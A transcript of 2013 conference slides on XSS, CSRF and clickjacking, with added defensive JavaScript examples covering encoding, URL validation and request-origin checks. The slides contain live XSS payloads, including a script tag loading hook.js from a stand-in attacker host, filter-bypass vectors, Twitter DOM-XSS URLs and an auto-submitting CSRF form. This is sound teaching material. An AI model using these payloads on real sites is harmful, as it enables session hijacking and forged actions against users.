Three vulnerabilities in web apps (Tre sårbarheter i webbappar)

Presentation of three web application vulnerabilities, in Swedish. Given at GeekMeet Stockholm, January 2013.

Presentation transcript

    • Three vulnerabilities in web apps. @johnwilander, GeekMeet 2013
    • All the demos are in the FOSS project http://1-liner.org
    • Three vulnerabilities in web apps: Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Clickjacking
    • Over 50% are XSS. Source: IBM X-Force 2012 Mid-year Trend and Risk Report, September 2012
    • Cross-Site Scripting: theory (diagram slide)
    • Cross-Site Scripting, type 1: reflected (diagram slide; labels: Cross-Site Scripting, Phishing)
    • Cross-Site Scripting, type 2: stored (diagram slide)
    • Cross-Site Scripting, type 2: stored (diagram slide, continued)
    • Cross-Site Scripting, type 0: DOM-based (diagram slide; labels: Cross-Site Scripting, Phishing)
    • Cross-Site Scripting, type 0: DOM-based. No request to the server! Single-page apps mean that injected scripts "stay around" in the DOM.
    • https://secure.example.com/authentication#language=sv&country=SE
    • https://secure.example.com/authentication#language=sv&country=SE: the part after # is never sent to the server. Always be careful about using data from the URL, especially after #.
    • Would you click on … https://secure.example.com/authentication#language=<script src="http://attackr.se:3000/hook.js"></script>&country=SE
    • Would you click on … https://secure.example.com/authentication#language=%3Cscript%20src%3D%22http%3A%2F%2Fattackr.se%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E&country=SE
    • Would you click on … http://bit.ly/Yg4T32
    • Filter out <script>? (Ext JS, Ext.util.Format.stripScripts)
      var ... ,
      stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig,
      /**
       * Strips all script tags
       * @param {Object} value The text from which to strip script tags
       * @return {String} The stripped text
       */
      stripScripts : function(v) {
          return !v ? v : String(v).replace(stripScriptsRe, "");
      },
      http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts
    • Filter out <script>? Payloads that get past a <script> filter:
      <img src=1 onerror=alert(1)>
      <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
      <body onload=alert(XSS)>
      <table background="javascript:alert(XSS)">
      ¼script¾alert(¢XSS¢)¼/script¾
      <video poster=javascript:alert(1)//
    • "Come on, that stuff doesn't really work, does it?" It does. Demo.
    • DOM-based XSS in Twitter, September 2010. Source: http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
    • (function(g){
          var a = location.href.split("#!")[1];
          if(a) {
              g.location = a;
          }
      })(window);
    • What does this code do? (Same snippet as above.)
    • "https://twitter.com/#!/johnwilander".split("#!")[1] returns "/johnwilander"
    • So the snippet runs window.location = "/johnwilander". A leading '/' keeps the domain but changes the path, so twitter.com/#!/johnwilander becomes twitter.com/johnwilander. Read more: http://kotowicz.net/absolute/
    • http://twitter.com/#!javascript:alert(document.domain);
    • http://twitter.com/#!javascript:alert(document.domain); is never sent to the server => DOM-based XSS
    • The Patch™
      var c = location.href.split("#!")[1];
      if (c) {
          window.location = c.replace(":", "");
      } else {
          return true;
      }
    • The Patch™ (same code): replace() with a string pattern replaces only the first match of the search string.
    • http://twitter.com/#!javascript::alert(document.domain);
    • http://twitter.com/#!javascript::alert(document.domain); (the first ':' is removed, the second one remains)
    • The 2nd Patch™
      (function(g){
          var a = location.href.split("#!")[1];
          if(a) {
              g.location = a.replace(/:/gi,"");
          }
      })(window);
    • The 2nd Patch™ (same code), annotated: the slashes are the regexp delimiters, g means global matching, i means ignore upper/lower case.
    • Fiiinished?
    • http://twitter.com#!javascript&x58;alert(1)
    • http://twitter.com#!javascript&x58;alert(1), with an HTML entity for ':'
    • The n:th Patch™ (this one works)
      (function(g){
          var a = location.href.split("#!")[1];
          if(a) {
              g.location.pathname = a;
          }
      })(window);
      Note that Twitter actually does the right thing: https://twitter.com/about/security
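The slides above show three character-stripping patches fail and a fourth one succeed by assigning to location.pathname. As an added example (not code from the talk or from Twitter), the following validates the "#!" fragment with the WHATWG URL parser, which makes explicit why the working patch works: the result is only ever a path on the current origin, and any fragment that parses as a different scheme or host is rejected. The site origin https://twitter.com, the function names and the location-like object are assumptions for the demo.

```javascript
// Added example, not code from the talk or from Twitter. It checks the part
// after "#!" with the URL parser instead of stripping characters, which is
// the reason the "n:th patch" (assigning to location.pathname) works: the
// navigation can only ever land on a path of the current origin.
// Runs in Node (URL is a global) or in a browser.

const SITE_ORIGIN = "https://twitter.com"; // assumed origin for the demo

// Same extraction as the snippet on the slides.
function hashbangTarget(href) {
  return href.split("#!")[1];
}

// Returns the pathname on siteOrigin that the fragment denotes, or null when
// the fragment is absent, unparsable, or resolves to anything that is not an
// https page on siteOrigin. "javascript:alert(1)", "javascript::alert(1)",
// "//attackr.se/x" and "https://attackr.se/x" all come back as null because
// the parser classifies them by scheme and origin, not by looking for ':'.
function safeHashbangPath(href, siteOrigin = SITE_ORIGIN) {
  const target = hashbangTarget(href);
  if (!target) return null;
  let resolved;
  try {
    resolved = new URL(target, siteOrigin);
  } catch (err) {
    return null; // unparsable fragment: do not navigate
  }
  if (resolved.protocol !== "https:" || resolved.origin !== siteOrigin) {
    return null;
  }
  return resolved.pathname;
}

// The redirect itself, written against a location-like object so it can be
// exercised outside a browser. Assigning pathname, never href, keeps the
// current origin no matter what the fragment contained.
function applyHashbang(loc) {
  const path = safeHashbangPath(loc.href, loc.origin);
  if (path !== null) {
    loc.pathname = path;
  }
  return path;
}

// Constructed stand-in for window.location (not a real browser object).
const demoLocation = {
  href: "https://twitter.com/#!/johnwilander",
  origin: "https://twitter.com",
  pathname: "/",
};
```

In a real page the call would be applyHashbang(window.location). Note that the entity-encoded payload from the slide, javascript&x58;alert(1), is accepted: parsed as a URL it is simply the relative path /javascript&x58;alert(1) on the site's own origin, which is exactly the harmless outcome the pathname assignment produces.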
    • Solve problems like these the right way, with client-side encoding
    • https://github.com/chrisisbeef/jquery-encoder
      $.encoder.canonicalize() Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>
      $.encoder.encodeForCSS() Encodes for safe usage in style attribute and style()
      $.encoder.encodeForHTML() Encodes for safe usage in innerHTML and html()
      $.encoder.encodeForHTMLAttribute() Encodes for safe usage in HTML attributes
      $.encoder.encodeForJavaScript() Encodes for safe usage in event handlers etc
      $.encoder.encodeForURL() Encodes for safe usage in href etc
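The "Filter out <script>?" slides and the client-side encoding slide make one point between them: a filter that hunts for a tag name lets every other vector through, while encoding for the output context makes the whole value inert. As an added example (not code from the talk, from Ext JS or from jquery-encoder), the block below runs the stripScripts regexp from the Ext JS slide over the payloads from the next slide, then applies a small HTML encoder of the kind encodeForHTML() represents. The encoder, the canStartTag probe and the payload list are this example's own constructions.

```javascript
// Added example, not code from the talk, from Ext JS or from jquery-encoder.
// It runs the stripScripts regexp from the Ext JS slide over the payloads from
// the next slide, then does what an encodeForHTML() must do instead: make the
// value inert for the HTML text context rather than hunt for one tag name.
// Runs in Node or a browser, no dependencies.

// The Ext JS regexp from the slide, with its escapes restored.
const stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig;
function stripScripts(v) {
  return !v ? v : String(v).replace(stripScriptsRe, "");
}

// Minimal HTML encoder: every character that can open or close markup or
// terminate a quoted attribute becomes an entity. Written for this example;
// it is not jquery-encoder's implementation.
const HTML_ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
};
function encodeForHTML(v) {
  return String(v).replace(/[&<>"'\/]/g, (c) => HTML_ENTITIES[c]);
}

// Crude probe used only for the comparison: after the transformation, can the
// string still start an HTML tag? A real parser is more forgiving than this,
// which is one more reason a denylist of tag names cannot be complete.
function canStartTag(s) {
  return /<[a-zA-Z\/!?]/.test(s);
}

// Constructed inputs: the payloads listed on the "Filter out <script>?" slide,
// plus one that the regexp does catch.
const PAYLOADS = [
  '<script>alert(1)</script>',
  '<img src=1 onerror=alert(1)>',
  '<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>',
  '<body onload=alert(XSS)>',
  '<table background="javascript:alert(XSS)">',
  '<video poster=javascript:alert(1)//',
];

// For each payload: what the filter leaves behind, and what encoding produces.
function compare(payloads = PAYLOADS) {
  return payloads.map((p) => {
    const stripped = stripScripts(p);
    const encoded = encodeForHTML(p);
    return {
      payload: p,
      stripped,
      survivesStrip: canStartTag(stripped),
      encoded,
      survivesEncode: canStartTag(encoded),
    };
  });
}

// How many payloads each approach leaves able to start a tag.
function survivors(payloads = PAYLOADS) {
  const rows = compare(payloads);
  return {
    afterStrip: rows.filter((r) => r.survivesStrip).length,
    afterEncode: rows.filter((r) => r.survivesEncode).length,
  };
}
```

The filter removes exactly one of the six inputs; encoding neutralises all six, because it never needs to know which tag or attribute the input was trying to form. The same reasoning is why the slide lists separate encoders for attributes, JavaScript, CSS and URLs: the safe transformation depends on where the value is inserted, not on what the value contains.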
    • A really nasty one: http://www.aol.com/
    • Protection against XSS: Content Security Policy http://www.w3.org/TR/CSP/
    • A new HTTP response header that says: only allow scripts from approved domains, and only allow scripts from files, i.e. no inline scripts
    • self = the same origin (host, protocol and port); the keyword is written in single quotes in the header.
      Content-Security-Policy: default-src 'self'
      Only load scripts, plugins, CSS, images, audio/video, frames, fonts and data from the site's own domain.
      Content-Security-Policy: default-src 'self'; img-src *; script-src trusted.com
      Accept images from any domain, scripts from trusted.com, and everything else only from the site's own domain.
    • CSRF: my favourite!
    • Cross-Site Request Forgery (diagram slide)
    • Cross-Site Request Forgery (diagram slide; labels: Cross-Site Request Forgery, Phishing)
    • Is www.attackr.se allowed to load images like this: <img src="https://secure.example.com/logo.png" /> ?
    • Is www.attackr.se allowed to load images like this: <img src="https://secure.example.com/authentication#language=sv&country=SE" /> ?
    • With an img element, www.attackr.se can silently send an HTTP GET to any domain:
      <img src="https://secure.example.com/authentication#language=sv&country=SE" height=0 width=0 />
    • "What about HTTP POST then?"
    • (Demo slides of the 1-liner app.) A text box "What's on your mind?" with a POST button. John types "I love OWASP!" and posts it; the page shows "John: I love OWASP!".
    • (Demo slides, continued.) Without John typing anything, "I hate OWASP!" is posted and the page shows "John: I hate OWASP!".
    • The page that did it: "Look at the lol cat!" with a hidden, self-submitting form:
      <form id="target" method="POST" action="https://1-liner.org/form">
          <input type="text" value="I hate OWASP!" name="oneLiner"/>
          <input type="submit" value="POST"/>
      </form>
      <script type="text/javascript">
          $(document).ready(function() {
              $("#target").submit();
          });
      </script>
    • csrfMulti.html loads target0.html in an invisible iframe (diagram slide)
    • csrfMulti.html: invisible iframe with target0.html, wait, then csrfMulti1.html with target1.html in another invisible iframe (diagram slide)
    • The chain continues through csrfMulti2.html / target2.html and csrfMulti3.html / target3.html, each step waiting and then loading the next target in a further invisible iframe (diagram slides)
    • Demo: POST CSRF against REST/json
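The CSRF slides show that a page on www.attackr.se can make the browser submit a POST to 1-liner.org with the victim's cookies attached. As an added example (not code from the 1-liner project), the block below is the server-side check a JSON endpoint like the one in the demo can apply before it reads the body: it relies on two browser properties, that an HTML form can only send application/x-www-form-urlencoded, multipart/form-data or text/plain, and that a cross-site POST carries an Origin header. The origin https://1-liner.org, the function names and the four sample requests are constructed for this example.

```javascript
// Added example, not code from the 1-liner project. It shows how a JSON
// endpoint such as the one in the POST CSRF demo can separate a cross-site
// form submission from a same-origin XMLHttpRequest before it touches the
// body. Pure function over a request-like object, so it runs without a server.

const SITE_ORIGIN = "https://1-liner.org"; // assumed origin of the app

function lowerCaseHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) out[name.toLowerCase()] = value;
  return out;
}

// Decision for a state-changing request. Two properties of browsers do the
// work: an HTML form can only send application/x-www-form-urlencoded,
// multipart/form-data or text/plain (so a form posting a JSON-looking body
// arrives as text/plain), and browsers attach an Origin header to cross-site
// POSTs. Requests with neither Origin nor Referer are refused (fail closed).
function classifyWrite(req, siteOrigin = SITE_ORIGIN) {
  const h = lowerCaseHeaders(req.headers || {});
  if (req.method !== "POST") {
    return { allowed: false, reason: "state changes must use POST" };
  }
  const contentType = (h["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (contentType !== "application/json") {
    return { allowed: false, reason: "content type " + (contentType || "(none)") + " is not application/json" };
  }
  let origin = h["origin"] || null;
  if (!origin && h["referer"]) {
    try {
      origin = new URL(h["referer"]).origin;
    } catch (err) {
      origin = null;
    }
  }
  if (!origin) {
    return { allowed: false, reason: "no Origin or Referer header" };
  }
  if (origin !== siteOrigin) {
    return { allowed: false, reason: "cross-site request from " + origin };
  }
  return { allowed: true, reason: "same-origin JSON request" };
}

// Constructed requests (not captured traffic). The first is what the hidden
// form on attackr.se produces; the second is the app's own XHR; the third is
// a cross-site JSON request, which a browser would only send after a CORS
// preflight; the fourth is a plain navigation.
const ATTACKER_FORM_POST = {
  method: "POST",
  headers: { "Origin": "https://www.attackr.se", "Content-Type": "text/plain" },
  body: '{"oneLiner":"I hate OWASP!"}',
};
const SAME_ORIGIN_XHR = {
  method: "POST",
  headers: { "Origin": "https://1-liner.org", "Content-Type": "application/json; charset=utf-8" },
  body: '{"oneLiner":"I love OWASP!"}',
};
const CROSS_SITE_JSON = {
  method: "POST",
  headers: { "Origin": "https://www.attackr.se", "Content-Type": "application/json" },
  body: '{"oneLiner":"I hate OWASP!"}',
};
const GET_WITH_REFERER = {
  method: "GET",
  headers: { "Referer": "https://1-liner.org/" },
};
```

The content-type check alone already stops the auto-submitting form from the earlier slide, and the origin check stops anything else that is cross-site. Both are defence in depth: a per-session token that the server verifies on every state-changing request is still the standard CSRF protection, and these header checks complement rather than replace it.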
    • Clickjacking... or Likejacking, or Followjacking, or ...
    • Clickjacking demo
    • X-Frame-Options: http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx and http://tools.ietf.org/html/draft-gondrom-frame-options-01
    • No page may load me in an iframe, or: only pages on my own domain may load me in an iframe
    • X-Frame-Options: DENY
      X-Frame-Options: SAMEORIGIN
      (Coming: X-Frame-Options: ALLOW-FROM [list])
    • Interested? Join your local OWASP chapter: https://www.owasp.org/index.php/OWASP_Chapter. Start following these people on Twitter: @0x6D6172696F @garethheyes @WisecWisec @securityninja @jeremiahg @kkotowicz @webtonull @manicode @securityshell. Start hacking yourself, it's fun! The best place to start? Your own sites, of course. Just keep it legal ;)